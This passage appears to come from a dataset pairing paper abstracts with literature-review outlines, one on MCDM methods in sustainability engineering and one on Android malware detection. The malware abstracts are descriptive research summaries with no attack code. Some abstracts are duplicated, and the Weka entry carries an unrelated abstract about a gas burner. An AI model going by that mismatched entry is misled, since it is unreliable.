sustainability are inherently multi-objective processes that require joint considerations of environmental, industrial, economic and social criteria in all stages of decision making. The success of such initiatives, however, depends on the solidity and the relevance of their strategic frameworks. This paper proposes strategic positioning of pollution prevention and clean production projects via design of a sustainable environmental management system (SEMS) that is responsive to regulatory requirements, and is relevant to industry culture and business structure. Built on the traditional and familiar environmental management system platform and the requirements of the multi-criteria decision making models ELECTRE III, the SEMS is capable of supporting design and implementation of defensible solutions to environmental problems industry face today according to sustainability criteria. The ELECTRE III model was selected as an integral part of the framework due to its ease of application, flexibility in design and selection of performance criteria, and capability to identify the best management solutions by giving an order of preference to multiple alternatives. The proposed SEMS framework is also in line with the Rio+20 sustainable development goals, objectives and guidelines that call for action and result-oriented strategies and institutional frameworks that could account for multiple stakeholders' key issues while suggesting environmental solutions according to the three dimensions of sustainable development. A case study that demonstrates the management of waste streams at a manufacturer of energy drinks and diet bars is provided to demonstrate how the SEMS can be designed and implemented. --- paper_title: Development of a decision support system for the study of an area after the occurrence of forest fire paper_content: There is a great diffusion of modern information systems in all areas of science. In the case of forestry, new information tools have emerged during the last 15 years which have helped to improve the work of foresters. Decision support systems (DSSs) are applications which are designed to help managers in the task of decision making, by accelerating the relevant decision-making processes, while simultaneously focusing on the conservation of natural, financial and human resources. In this paper, we describe the development of a DSS which has been designed to help managers in the process of decision making, in relation to areas that have been burnt by forest fires. In addition, the above system also provides the user with the capacity to create hypothetical (what-if) scenarios in order to achieve the best form of intervention. The relevant software was created using Visual C# and the weights of the various parameters were calculated using multi-criteria decision analysis. --- paper_title: Sustainability Decision Support Framework for Industrial System Prioritization paper_content: A multicriteria decision-making methodology for the sustainability prioritization of industrial systems is proposed. The methodology incorporates a fuzzy Analytic Hierarchy Process method that allows the users to assess the soft criteria using linguistic terms. A fuzzy Analytic Network Process method is used to calculate the weights of each criterion, which can tackle the interdependencies and interactions among the criteria. The Preference Ranking Organization Method for Enrichment Evaluation approach is used to prioritize the sustainability sequence of the alternative systems. Moreover, a sensitivity analysis method was developed to investigate the most critical and sensitive criteria. The developed methodology was illustrated by a case study to rank the sustainability of five alternative hydrogen production technologies. The advantages of the developed methodology over the previous approaches were demonstrated by comparing the results determined by the proposed framework with those determined using the pervious approaches. © 2015 American Institute of Chemical Engineers AIChE J, 2015 --- paper_title: Evaluation and selection of materials for particulate matter MEMS sensors by using hybrid MCDM methods paper_content: Air pollution poses serious problems as global industrialization continues to thrive. Since air pollution has grave impacts on human health, industry experts are starting to fathom how to integrate particulate matter (PM) sensors into portable devices; however, traditional micro-electro-mechanical systems (MEMS) gas sensors are too large. To overcome this challenge, experts from industry and academia have recently begun to investigate replacing the traditional etching techniques used on MEMS with semiconductor-based manufacturing processes and materials, such as gallium nitride (GaN), gallium arsenide (GaAs), and silicon. However, studies showing how to systematically evaluate and select suitable materials are rare in the literature. Therefore, this study aims to propose an analytic framework based on multiple criteria decision making (MCDM) to evaluate and select the most suitable materials for fabricating PM sensors. An empirical study based on recent research was conducted to demonstrate the feasibility of our analytic framework. The results provide an invaluable future reference for research institutes and providers. --- paper_title: A Hybrid MCDM Approach for Strategic Project Portfolio Selection of Agro By-Products paper_content: Due to the increasing size of the population, society faces several challenges for sustainable and adequate agricultural production, quality, distribution, and food safety in the strategic project portfolio selection (SPPS). The initial adaptation of strategic portfolio management of genetically modified (GM) Agro by-products (Ab-Ps) is a huge challenge in terms of processing the agro food product supply-chain practices in an environmentally nonthreatening way. As a solution to the challenges, the socio-economic characteristics for SPPS of GM food purchasing scenarios are studied. Evaluation and selection of the GM agro portfolio management are the dynamic issues due to physical and immaterial criteria involving a hybrid multiple criteria decision making (MCDM) approach, combining modified grey Decision-Making Trial and Evaluation Laboratory (DEMATEL), Multi-Attributive Border Approximation area Comparison (MABAC) and sensitivity analysis. Evaluation criteria are grouped into social, differential and beneficial clusters, and the modified DEMATEL procedure is used to derive the criteria weights. The MABAC method is applied to rank the strategic project portfolios according to the aggregated preferences of decision makers (DMs). The usefulness of the proposed research framework is validated with a case study. The GM by-products are found to be the best portfolio. Moreover, this framework can unify the policies of agro technological improvement, corporate social responsibility (CSR) and agro export promotion. --- paper_title: Key performance indicators (KPIs) and priority setting in using the multi-attribute approach for assessing sustainable intelligent buildings paper_content: The main objectives of this paper are to: firstly, identify key issues related to sustainable intelligent buildings (environmental, social, economic and technological factors); develop a conceptual model for the selection of the appropriate KPIs; secondly, test critically stakeholder's perceptions and values of selected KPIs intelligent buildings; and thirdly develop a new model for measuring the level of sustainability for sustainable intelligent buildings. This paper uses a consensus-based model (Sustainable Built Environment Tool- SuBETool), which is analysed using the analytical hierarchical process (AHP) for multi-criteria decision-making. The use of the multi-attribute model for priority setting in the sustainability assessment of intelligent buildings is introduced. The paper commences by reviewing the literature on sustainable intelligent buildings research and presents a pilot-study investigating the problems of complexity and subjectivity. This study is based upon a survey perceptions held by selected stakeholders and the value they attribute to selected KPIs. It is argued that the benefit of the new proposed model (SuBETool) is a ‘tool’ for ‘comparative’ rather than an absolute measurement. It has the potential to provide useful lessons from current sustainability assessment methods for strategic future of sustainable intelligent buildings in order to improve a building's performance and to deliver objective outcomes. Findings of this survey enrich the field of intelligent buildings in two ways. Firstly, it gives a detailed insight into the selection of sustainable building indicators, as well as their degree of importance. Secondly, it tesst critically stakeholder's perceptions and values of selected KPIs intelligent buildings. It is concluded that the priority levels for selected criteria is largely dependent on the integrated design team, which includes the client, architects, engineers and facilities managers. --- paper_title: Environmental sustainability benchmarking of the U.S. and Canada metropoles: An expert judgment-based multi-criteria decision making approach paper_content: Abstract In this paper, environmental sustainability performance assessment of 27 U.S. and Canada metropoles is addressed. A four-step hierarchical fuzzy multi-criteria decision-making approach is developed. In the first step, the proposed methodology is established by determining the sustainability performance indicators (a total of 16 sustainability indicators are considered), collecting the data and contacting experts from academia, U.S. government agencies and within the industry. In the second step, experts are contacted and the entire list is finalized; sustainability performance evaluation forms are delivered; and then expert judgment results are obtained and quantified, respectively. In the third step, the proposed Multi-criteria Intuitionistic Fuzzy Decision Making model is developed and sustainability performance scores are quantified by using the collected data, multi-criteria decision making model and sustainability indicator weights obtained from expert judgment phase. In the final step, the sustainability scores and rankings of the 27 metropoles, results analysis and discussions, and statistical highlights about the research findings are provided. Results indicated that the average sustainability performance score is found to be 0.524 over scale between 0 and 1. The metropole with the greatest sustainability performance score is found to be New York with 0.703 and the poorest performing city is identified as Cleveland with 0.394. The results of the statistical analysis indicate that the greatest significant correlations are obtained with carbon dioxide (CO 2 ) emissions per person (−0.749 – significant negative correlation with sustainability performance score) and share of workers traveling by public transport (+0.753 – significant positive correlation with sustainability performance score). Therefore, the CO 2 emissions and public transport are found to have the most significant impact on the sustainability scores. --- paper_title: Compression ignition engine performance modelling using hybrid MCDM techniques for the selection of optimum fish oil biodiesel blend at different injection timings paper_content: Abstract The increasing demand on energy due to population growth and rise of living standards has led to considerable use of fossil fuels which cause environmental pollution and depletion of fossil fuels. Biodiesel proves to be a good alternative for fossil fuels. But sustainability of biodiesel is the key factor for determining it as a fuel in diesel engines. It needs identification of proper blend of biodiesel and diesel to meet the efficiency, engine suitability and environmental acceptability. Alternative fuel blend evaluation in IC engine fuel technologies is a very important strategic decision tool involving balancing between a number of criteria such as performance, emission and combustion parameters and opinions from different decision maker of IC engine experts. Hence, it is a MCDM problem. This paper describes the application of hybrid Multi Criteria Decision Making (MCDM) techniques for the selection of optimum biodiesel blend in IC engine. FAHP-TOPSIS, FAHP-VIKOR and FAHP-ELECTRE, are the three methods that are used to evaluate the best blend. The performances of these MCDM methods are also compared with each other. Here, FAHP is used to determine the relative weights of the criteria, whereas TOPSIS, VIKOR and ELECTRE are used for obtaining the final ranking of alternatives. A single cylinder, constant speed and direct injection diesel engine with a rated output of 4.4 kW is used for exploratory analysis of evaluation criteria at different load conditions. Diesel, B20, B40, B60, B80 and B100 fuel blends are prepared by varying the proportion of biodiesel. Similarly, Brake thermal efficiency (BTE), Exhaust gas temperature (EGT), Oxides of Nitrogen (NO x ), Smoke, Hydrocarbon (HC), Carbon monoxide (CO), Carbon dioxide (CO 2 ), Ignition Delay, Combustion Duration and Maximum Rate of Pressure Rise are considered as the evaluation criteria. The ranking of alternatives obtained by FAHP-TOPSIS, FAHP-VIKOR and FAHP-ELECTRE are B20 > Diesel > B40 > B60 > B80 > B100 for 21°bTDC and 24°bTDC and Diesel > B20 > B40 > B60 > B80 > B100 for 27°bTDC. It shows that B20 is ranked first for 21°bTDC and 24°bTDC and second for 27°bTDC injection timing. Hence, it is concluded that mixing 20% biodiesel with diesel is suggested as a good replacement for diesel. This paper provides a new insight of applying MCDM techniques to evaluate the best fuel blend by decision makers such as engine manufactures and R&D engineers to meet the fuel economy and emission norms to empower green revolution. --- paper_title: Measuring systems sustainability with multi-criteria methods: A critical review paper_content: Determining the sustainability of a system (e.g. through a criteria and indicators approach) has been the focus of research in many branches of science. Frequently, this research used multiple criteria decision making techniques. In this work, we analyze and critically assess the literature published on these topics. For this purpose, a set of 271 papers appearing in the ISI Web of Science database has been studied. The results show that these techniques have been applied to a great variety of problems, levels, and sectors, related to sustainability. Thus, up to 15 multiple criteria decision making techniques, which have been applied in 4 or more papers, have been identified. Those techniques have been grouped in 5 large clusters; the two most used being those called Analytic Hierarchical Process and Weighted Arithmetic Mean. On the other hand, in this work it has been verified that the use of multiple criteria decision making techniques hybridized with group decision-making techniques is quite common, and the use of both techniques for assessing sustainability problems has risen over the last few years. The aim of this hybridization process consists of including in the analysis the preferences of the stakeholders with respect to the indicators initially suggested. Finally, it has been seen that during the past few years there has been a great proliferation of works aggregating sustainability criteria by using this type of tool, which is undoubtedly a sign of the paramount importance of these techniques in this highly pluridisciplinary context. --- paper_title: Sustainable Assessment of Alternative Sites for the Construction of a Waste Incineration Plant by Applying WASPAS Method with Single-Valued Neutrosophic Set paper_content: The principles of sustainability have become particularly important in the construction, real estate maintenance sector, and all areas of life in recent years. The one of the major problem of urban territories that domestic and construction waste of generated products cannot be removed automatically. --- paper_title: Urban sewage sludge, sustainability, and transition for Eco-City: Multi-criteria sustainability assessment of technologies based on best-worst method paper_content: The treatment of urban sewage sludge is of vital importance for mitigating the risks of environmental contaminations, and the negative effects on human health. However, there are usually various different technologies for the treatment of urban sewage sludge; thus, it is difficult for decision-makers/stakeholders to select the most sustainable technology among multiple alternatives. This study aims at developing a generic multi-criteria decision support framework for sustainability assessment of the technologies for the treatment of urban sewage sludge. A generic criteria system including both hard and soft criteria in economic, environmental, social and technological aspects was developed for sustainability assessment. The improved analytic hierarchy process method, namely Best-Worst method, was employed to determine the weights of the criteria and the relative priorities of the technologies with respect to the soft criteria. Three MCDM methods including the sum weighted method, digraph model, and TOPSIS were used to determine sustainability sequence of the alternative technologies for the treatment of urban sewage sludge. Three technologies including landfilling, composting, and drying incineration have been studied using the proposed framework. The sustainability sequence of these three technologies determined by these three methods was obtained, and finally the priority sequence was determined as landing filling, drying incineration and composting in the descending order. --- paper_title: SCORE: a novel multi-criteria decision analysis approach to assessing the sustainability of contaminated land remediation. paper_content: The multi-criteria decision analysis (MCDA) method provides for a comprehensive and transparent basis for performing sustainability assessments. Development of a relevant MCDA-method requires consideration of a number of key issues, e.g. (a) definition of assessment boundaries, (b) definition of performance scales, both temporal and spatial, (c) selection of relevant criteria (indicators) that facilitate a comprehensive sustainability assessment while avoiding double-counting of effects, and (d) handling of uncertainties. Adding to the complexity is the typically wide variety of inputs, including quantifications based on existing data, expert judgements, and opinions expressed in interviews. The SCORE (Sustainable Choice Of REmediation) MCDA-method was developed to provide a transparent assessment of the sustainability of possible remediation alternatives for contaminated sites relative to a reference alternative, considering key criteria in the economic, environmental, and social sustainability domains. The criteria were identified based on literature studies, interviews and focus-group meetings. SCORE combines a linear additive model to rank the alternatives with a non-compensatory approach to identify alternatives regarded as non-sustainable. The key strengths of the SCORE method are as follows: a framework that at its core is designed to be flexible and transparent; the possibility to integrate both quantitative and qualitative estimations on criteria; its ability, unlike other sustainability assessment tools used in industry and academia, to allow for the alteration of boundary conditions where necessary; the inclusion of a full uncertainty analysis of the results, using Monte Carlo simulation; and a structure that allows preferences and opinions of involved stakeholders to be openly integrated into the analysis. A major insight from practical application of SCORE is that its most important contribution may be that it initiates a process where criteria otherwise likely ignored are addressed and openly discussed between stakeholders. --- paper_title: A sensitivity analysis in MCDM problems: A statistical approach paper_content: This study provides a model for result consistency evaluation of multi-criteria decision-making (MDM) methods and selection of the optimal one. The study presents the results of an analysis of the sensitivity of decision-making based on the rank methods: SAW, MOORA, VIKOR, COPRAS, CODAS, TOPSIS, D’IDEAL, MABAC, PROMETHEE-I,II, ORESTE-II with variations in the elements in the decision matrix within a given error (imprecision). It is suggested to use multiple simulation of the elements estimations of the decision matrix within a given error for calculating the ranks of alternatives, which allows obtaining statistical estimates of ranks. Based on the statistics of simulations, decision-making can be carried out not only on the alternatives statistics having rank I but also on the statistics of alternatives having the largest total I and II rank or I, II and III ranks. This is especially true when the difference in rank values ​​is not large and is distributed evenly among the first three ranks. The calculations results for the task of selecting the adequate location of 8 objects by 11 criteria are presented here. The main result shows that the alternatives having I, II and III ranks for some ranking methods are not distinguishable within the selected error value of the elements in the decision matrix. A quantitative analysis can only narrow the number of effective alternatives for a final decision. A statistical analysis makes the number of options estimation possible in which an alternative has a priority. Additional criteria that take into account both aggregate priorities and the availability of possible priorities for other alternatives with small variations in the decision matrix provide additional important information for the decision-maker. ---
Title: Application of MCDM Methods in Sustainability Engineering: A Literature Review 2008–2018 Section 1: Introduction Description 1: Discuss the emergence of the concept of sustainability, the definition of sustainable development, and the role of sustainable engineering, highlighting the importance of multiple criteria decision making (MCDM) methods in this context. Section 2: Primary Review Results Description 2: Present the methodology used to collect and process the articles, the total number of MCDM articles found in various fields, and the trend of increasing publications in recent years. Section 3: Detailed Review Results Description 3: Provide an in-depth analysis and categorization of 108 collected articles into different areas like civil engineering, supply chains, transport and logistics, energy, and others. Each category should discuss the specific application of MCDM methods within these sectors. Section 4: Civil Engineering and Infrastructure Description 4: Detail the application of MCDM methods in civil engineering and infrastructure projects, including case studies and frameworks involving various methods and criteria. Section 5: Supply Chain Management Description 5: Analyze the use of MCDM methods in supply chain management, highlighting the challenges and solutions related to sustainable supplier selection and other supply chain aspects. Section 6: Transport and Logistics Description 6: Discuss the application of MCDM methods in transport and logistics, including the selection of sustainable transport plans, location of logistics centers, and alternative fuels. Section 7: Energy Description 7: Review the application of MCDM methods in the energy sector, focusing on the selection of renewable energy sources, location of energy facilities, and planning of energy production projects. Section 8: Other Engineering Disciplines Description 8: Cover the application of MCDM methods in various other engineering disciplines, addressing environmental management, smart housing sustainability, and other miscellaneous topics. Section 9: Conclusions Description 9: Summarize the findings, highlighting the significance of MCDM methods in achieving sustainability in engineering, the prevailing trends, and future directions for research in using MCDM methods to address complex engineering problems.
Android Malware Detection & Protection: A Survey
7
--- paper_title: A survey of mobile malware in the wild paper_content: Mobile malware is rapidly becoming a serious threat. In this paper, we survey the current state of mobile malware in the wild. We analyze the incentives behind 46 pieces of iOS, Android, and Symbian malware that spread in the wild from 2009 to 2011. We also use this data set to evaluate the effectiveness of techniques for preventing and identifying mobile malware. After observing that 4 pieces of malware use root exploits to mount sophisticated attacks on Android phones, we also examine the incentives that cause non-malicious smartphone tinkerers to publish root exploits and survey the availability of root exploits. --- paper_title: Dissecting Android Malware: Characterization and Evolution paper_content: The popularity and adoption of smart phones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android. In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples. In this paper, we focus on the Android platform and aim to systematize or characterize existing Android malware. Particularly, with more than one year effort, we have managed to collect more than 1,200 malware samples that cover the majority of existing Android malware families, ranging from their debut in August 2010 to recent ones in October 2011. In addition, we systematically characterize them from various aspects, including their installation methods, activation mechanisms as well as the nature of carried malicious payloads. The characterization and a subsequent evolution-based study of representative families reveal that they are evolving rapidly to circumvent the detection from existing mobile anti-virus software. Based on the evaluation with four representative mobile security software, our experiments show that the best case detects 79.6% of them while the worst case detects only 20.2% in our dataset. These results clearly call for the need to better develop next-generation anti-mobile-malware solutions. --- paper_title: Android malware attacks and countermeasures: Current and future directions paper_content: Smartphones are rising in popularity as well as becoming more sophisticated over recent years. This popularity coupled with the fact that smartphones contain a lot of private user data is causing a proportional rise in different malwares for the platform. In this paper we analyze and classify state-of-the-art malware techniques and their countermeasures. The paper also reports a novel method for malware development and novel attack techniques such as mobile botnets, usage pattern based attacks and repackaging attacks. The possible countermeasures are also proposed. Then a detailed analysis of one of the proposed novel malware methods is explained. Finally the paper concludes by summarizing the paper. --- paper_title: Dissecting Android Malware: Characterization and Evolution paper_content: The popularity and adoption of smart phones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android. In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples. In this paper, we focus on the Android platform and aim to systematize or characterize existing Android malware. Particularly, with more than one year effort, we have managed to collect more than 1,200 malware samples that cover the majority of existing Android malware families, ranging from their debut in August 2010 to recent ones in October 2011. In addition, we systematically characterize them from various aspects, including their installation methods, activation mechanisms as well as the nature of carried malicious payloads. The characterization and a subsequent evolution-based study of representative families reveal that they are evolving rapidly to circumvent the detection from existing mobile anti-virus software. Based on the evaluation with four representative mobile security software, our experiments show that the best case detects 79.6% of them while the worst case detects only 20.2% in our dataset. These results clearly call for the need to better develop next-generation anti-mobile-malware solutions. --- paper_title: A survey of mobile malware in the wild paper_content: Mobile malware is rapidly becoming a serious threat. In this paper, we survey the current state of mobile malware in the wild. We analyze the incentives behind 46 pieces of iOS, Android, and Symbian malware that spread in the wild from 2009 to 2011. We also use this data set to evaluate the effectiveness of techniques for preventing and identifying mobile malware. After observing that 4 pieces of malware use root exploits to mount sophisticated attacks on Android phones, we also examine the incentives that cause non-malicious smartphone tinkerers to publish root exploits and survey the availability of root exploits. --- paper_title: Dissecting Android Malware: Characterization and Evolution paper_content: The popularity and adoption of smart phones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android. In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples. In this paper, we focus on the Android platform and aim to systematize or characterize existing Android malware. Particularly, with more than one year effort, we have managed to collect more than 1,200 malware samples that cover the majority of existing Android malware families, ranging from their debut in August 2010 to recent ones in October 2011. In addition, we systematically characterize them from various aspects, including their installation methods, activation mechanisms as well as the nature of carried malicious payloads. The characterization and a subsequent evolution-based study of representative families reveal that they are evolving rapidly to circumvent the detection from existing mobile anti-virus software. Based on the evaluation with four representative mobile security software, our experiments show that the best case detects 79.6% of them while the worst case detects only 20.2% in our dataset. These results clearly call for the need to better develop next-generation anti-mobile-malware solutions. --- paper_title: New Threats and Countermeasures in Digital Crime and Cyber Terrorism paper_content: Technological advances, although beneficial and progressive, can lead to vulnerabilities in system networks and security. While researchers attempt to find solutions, negative uses of technology continue to create new security threats to users. New Threats and Countermeasures in Digital Crime and Cyber Terrorism brings together research-based chapters and case studies on security techniques and current methods being used to identify and overcome technological vulnerabilities with an emphasis on security issues in mobile computing and online activities. This book is an essential reference source for researchers, university academics, computing professionals, and upper-level students interested in the techniques, laws, and training initiatives currently being implemented and adapted for secure computing. --- paper_title: Apposcopy: semantics-based detection of Android malware through static analysis paper_content: We present Apposcopy, a new semantics-based approach for identifying a prevalent class of Android malware that steals private user information. Apposcopy incorporates (i) a high-level language for specifying signatures that describe semantic characteristics of malware families and (ii) a static analysis for deciding if a given application matches a malware signature. The signature matching algorithm of Apposcopy uses a combination of static taint analysis and a new form of program representation called Inter-Component Call Graph to efficiently detect Android applications that have certain control- and data-flow properties. We have evaluated Apposcopy on a corpus of real-world Android applications and show that it can effectively and reliably pinpoint malicious applications that belong to certain malware families. --- paper_title: Droid Analytics: A Signature Based Analytic System to Collect, Extract, Analyze and Associate Android Malware paper_content: Smartphones and mobile devices are rapidly becoming indispensable devices for many users. Unfortunately, they also become fertile grounds for hackers to deploy malware. There is an urgent need to have a "security analytic & forensic system" which can facilitate analysts to examine, dissect, associate and correlate large number of mobile applications. An effective analytic system needs to address the following questions: How to automatically collect and manage a high volume of mobile malware? How to analyze a zero-day suspicious application, and compare or associate it with existing malware families in the database? How to reveal similar malicious logic in various malware, and to quickly identify the new malicious code segment? In this paper, we present the design and implementation of DroidAnalytics, a signature based analytic system to automatically collect, manage, analyze and extract android malware. The system facilitates analysts to retrieve, associate and reveal malicious logics at the "opcode level". We demonstrate the efficacy of DroidAnalytics using 150, 368 Android applications, and successfully determine 2, 475 Android malware from 102 different families, with 327 of them being zero-day malware samples from six different families. To the best of our knowledge, this is the first reported case in showing such a large Android malware analysis/detection. The evaluation shows the DroidAnalytics is a valuable tool and is effective in analyzing malware repackaging and mutations. --- paper_title: AndroSimilar: robust statistical feature signature for Android malware detection paper_content: Android Smartphone popularity has increased malware threats forcing security researchers and AntiVirus (AV) industry to carve out smart methods to defend Smartphone against malicious apps. Robust signature based solutions to mitigate threats become necessary to protect the Smartphone and confidential user data. In this paper we present AndroSimilar, a robust approach which generates signature by extracting statistically improbable features, to detect malicious Android apps. Proposed method is effective against code obfuscation and repackaging, widely used techniques to evade AV signature and to propagate unseen variants of known malware. AndroSimilar is a syntactic foot-printing mechanism that finds regions of statistical similarity with known malware to detect those unknown, zero day samples. Syntactic file similarity of whole file is considered instead of just opcodes for faster detection compared to known fuzzy hashing approaches. Results demonstrate robust detection of variants of known malware families. Proposed approach can be refined to deploy as Smartphone AV. --- paper_title: Detecting Android Malware by Analyzing Manifest Files paper_content: The threat of Android malware has increased owing to the increasing popularity of smartphones. Once an Android smartphone is infected with malware, the user suffers from various damages, such as the theft of personal information stored in the smartphones, the unintentional sending of short messages to premium-rate numbers without the user's knowledge, and the ability for the infected smartphones to be remotely operated and used for other malicious attacks. However, there are currently insufficient defense mechanisms against Android malware. This study proposes a new method to detect Android malware. The new method analyzes only manifest files that are required in Android applications. It realizes a lightweight approach for detection, and its effectiveness is experimentally confirmed by employing real samples of Android malware. The result shows that the new method can effectively detect Android malware, even when the sample is unknown. --- paper_title: Weka 3-Data Mining with Open Source Machine Learning Software in Java paper_content: A burner includes a central burner duct for passing combustion gas therethrough and an outer annular duct for the passage of combustion air and coaxial to the central burner duct. The ducts open or join at an opening area, upstream of which are one or two areas where the combustion gas and air are combined or brought together and mixed. A disk-shaped mixing element is positioned within the opening area centrally thereof and downstream of the first combination area and adjacent the second combination area. The mixing element has extending therethrough substantially in the direction of flow, a ring of separate passages. --- paper_title: On lightweight mobile phone application certification paper_content: Users have begun downloading an increasingly large number of mobile phone applications in response to advancements in handsets and wireless networks. The increased number of applications results in a greater chance of installing Trojans and similar malware. In this paper, we propose the Kirin security service for Android, which performs lightweight certification of applications to mitigate malware at install time. Kirin certification uses security rules, which are templates designed to conservatively match undesirable properties in security configuration bundled with applications. We use a variant of security requirements engineering techniques to perform an in-depth security analysis of Android to produce a set of rules that match malware characteristics. In a sample of 311 of the most popular applications downloaded from the official Android Market, Kirin and our rules found 5 applications that implement dangerous functionality and therefore should be installed with extreme caution. Upon close inspection, another five applications asserted dangerous rights, but were within the scope of reasonable functional needs. These results indicate that security configuration bundled with Android applications provides practical means of detecting malware. --- paper_title: Towards Formal Analysis of the Permission-Based Security Model for Android paper_content: Since the source code of Android was released to the public, people have concerned about the security of the Android system. Whereas the insecurity of a system can be easily exaggerated even with few minor vulnerabilities, the security is not easily demonstrated. Formal methods have been favorably applied for the purpose of ensuring security in different contexts to attest whether the system meets the security goals or not by relying on mathematical proofs. In order to commence the security analysis of Android, we specify the permission mechanism for the system. We represent the system in terms of a state machine, elucidate the security needs, and show that the specified system is secure over the specified states and transitions. We expect that this work will provide the basis for assuring the security of the Android system. The specification and verification were carried out using the Coq proof assistant. --- paper_title: PUMA: Permission Usage to Detect Malware in Android paper_content: The presence of mobile devices has increased in our lives offering almost the same functionality as a personal computer. Android devices have appeared lately and, since then, the number of applications available for this operating system has increased exponentially. Google already has its Android Market where applications are offered and, as happens with every popular media, is prone to misuse. In fact, malware writers insert malicious applications into this market, but also among other alternative markets. Therefore, in this paper, we present PUMA, a new method for detecting malicious Android applications through machine-learning techniques by analysing the extracted permissions from the application itself. --- paper_title: Performance Evaluation on Permission-Based Detection for Android Malware paper_content: It is a straightforward idea to detect a harmful mobile application based on the permissions it requests. This study attempts to explore the possibility of detecting malicious applications in Android operating system based on permissions. Compare against previous researches, we collect a relative large number of benign and malicious applications (124,769 and 480, respectively) and conduct experiments based on the collected samples. In addition to the requested and the required permissions, we also extract several easy-to-retrieve features from application packages to help the detection of malicious applications. Four commonly used machine learning algorithms including AdaBoost, Naive Bayes, Decision Tree (C4.5), and Support Vector Machine are used to evaluate the performance. Experimental results show that a permission-based detector can detect more than 81% of malicious samples. However, due to its precision, we conclude that a permission-based mechanism can be used as a quick filter to identify malicious applications. It still requires a second pass to make complete analysis to a reported malicious application. --- paper_title: DroidMat: Android Malware Detection through Manifest and API Calls Tracing paper_content: Recently, the threat of Android malware is spreading rapidly, especially those repackaged Android malware. Although understanding Android malware using dynamic analysis can provide a comprehensive view, it is still subjected to high cost in environment deployment and manual efforts in investigation. In this study, we propose a static feature-based mechanism to provide a static analyst paradigm for detecting the Android malware. The mechanism considers the static information including permissions, deployment of components, Intent messages passing and API calls for characterizing the Android applications behavior. In order to recognize different intentions of Android malware, different kinds of clustering algorithms can be applied to enhance the malware modeling capability. Besides, we leverage the proposed mechanism and develop a system, called Droid Mat. First, the Droid Mat extracts the information (e.g., requested permissions, Intent messages passing, etc) from each applicationi¦s manifest file, and regards components (Activity, Service, Receiver) as entry points drilling down for tracing API Calls related to permissions. Next, it applies K-means algorithm that enhances the malware modeling capability. The number of clusters are decided by Singular Value Decomposition (SVD) method on the low rank approximation. Finally, it uses kNN algorithm to classify the application as benign or malicious. The experiment result shows that the recall rate of our approach is better than one of well-known tool, Androguard, published in Black hat 2011, which focuses on Android malware analysis. In addition, Droid Mat is efficient since it takes only half of time than Androguard to predict 1738 apps as benign apps or Android malware. --- paper_title: Extending Android Security Enforcement with a Security Distance Model paper_content: Compared to the traditional operating system platforms, smart phone platforms have different infrastructures and security requirements. Therefore new corresponding security strategies are also required. In this paper firstly we analyze the Android applications' threats and existing security mechanisms' weakness. Then we present an extending of Android Security Enforcement with a Security Distance model, ASESD, to mitigate malware. The new scheme can be implemented in an Android phone and make applications more safe. Our theoratical anlyses and practical evaluations show ASESD more accurate and highly scalabe. --- paper_title: A Study of Android Application Security paper_content: The fluidity of application markets complicate smartphone security. Although recent efforts have shed light on particular security issues, there remains little insight into broader security characteristics of smartphone applications. This paper seeks to better understand smartphone application security by studying 1,100 popular free Android applications. We introduce the ded decompiler, which recovers Android application source code directly from its installation image. We design and execute a horizontal study of smartphone applications based on static analysis of 21 million lines of recovered code. Our analysis uncovered pervasive use/misuse of personal/ phone identifiers, and deep penetration of advertising and analytics networks. However, we did not find evidence of malware or exploitable vulnerabilities in the studied applications. We conclude by considering the implications of these preliminary findings and offer directions for future analysis. --- paper_title: Detecting repackaged smartphone applications in third-party android marketplaces paper_content: Recent years have witnessed incredible popularity and adoption of smartphones and mobile devices, which is accompanied by large amount and wide variety of feature-rich smartphone applications. These smartphone applications (or apps), typically organized in different application marketplaces, can be conveniently browsed by mobile users and then simply clicked to install on a variety of mobile devices. In practice, besides the official marketplaces from platform vendors (e.g., Google and Apple), a number of third-party alternative marketplaces have also been created to host thousands of apps (e.g., to meet regional or localization needs). To maintain and foster a hygienic smartphone app ecosystem, there is a need for each third-party marketplace to offer quality apps to mobile users. In this paper, we perform a systematic study on six popular Android-based third-party marketplaces. Among them, we find a common "in-the-wild" practice of repackaging legitimate apps (from the official Android Market) and distributing repackaged ones via third-party marketplaces. To better understand the extent of such practice, we implement an app similarity measurement system called DroidMOSS that applies a fuzzy hashing technique to effectively localize and detect the changes from app-repackaging behavior. The experiments with DroidMOSS show a worrisome fact that 5% to 13% of apps hosted on these studied marketplaces are repackaged. Further manual investigation indicates that these repackaged apps are mainly used to replace existing in-app advertisements or embed new ones to "steal" or re-route ad revenues. We also identify a few cases with planted backdoors or malicious payloads among repackaged apps. The results call for the need of a rigorous vetting process for better regulation of third-party smartphone application marketplaces. --- paper_title: DroidAPIMiner: Mining API-Level Features for Robust Malware Detection in Android paper_content: The increasing popularity of Android apps makes them the target of malware authors. To defend against this severe increase of Android malwares and help users make a better evaluation of apps at install time, several approaches have been proposed. However, most of these solutions suffer from some shortcomings; computationally expensive, not general or not robust enough. In this paper, we aim to mitigate Android malware installation through providing robust and lightweight classifiers. We have conducted a thorough analysis to extract relevant features to malware behavior captured at API level, and evaluated different classifiers using the generated feature set. Our results show that we are able to achieve an accuracy as high as 99% and a false positive rate as low as 2.2% using KNN classifier. --- paper_title: Formalisation and analysis of Dalvik bytecode paper_content: Abstract With the large, and rapidly increasing, number of smartphones based on the Android platform, combined with the open nature of the platform that allows “apps” to be downloaded and executed on the smartphone, misbehaving and malicious (malware) apps are set to become a serious problem. To counter this problem, automated tools for analysing and verifying apps are essential. Furthermore, to ensure high-fidelity of such tools, it is essential to formally specify both semantics and analyses. In this paper we present, to the best of our knowledge, the first formalisation of the complete Dalvik bytecode language including reflection features and the first formally specified control flow analysis for the language, including advanced control flow features such as dynamic dispatch, exceptions, and reflection. To determine which features to include in the formalisation and analysis, 1700 Android apps from the Google Play app market (formerly known as Android Market) were downloaded and examined. --- paper_title: Retargeting Android applications to Java bytecode paper_content: The Android OS has emerged as the leading platform for SmartPhone applications. However, because Android applications are compiled from Java source into platform-specific Dalvik bytecode, existing program analysis tools cannot be used to evaluate their behavior. This paper develops and evaluates 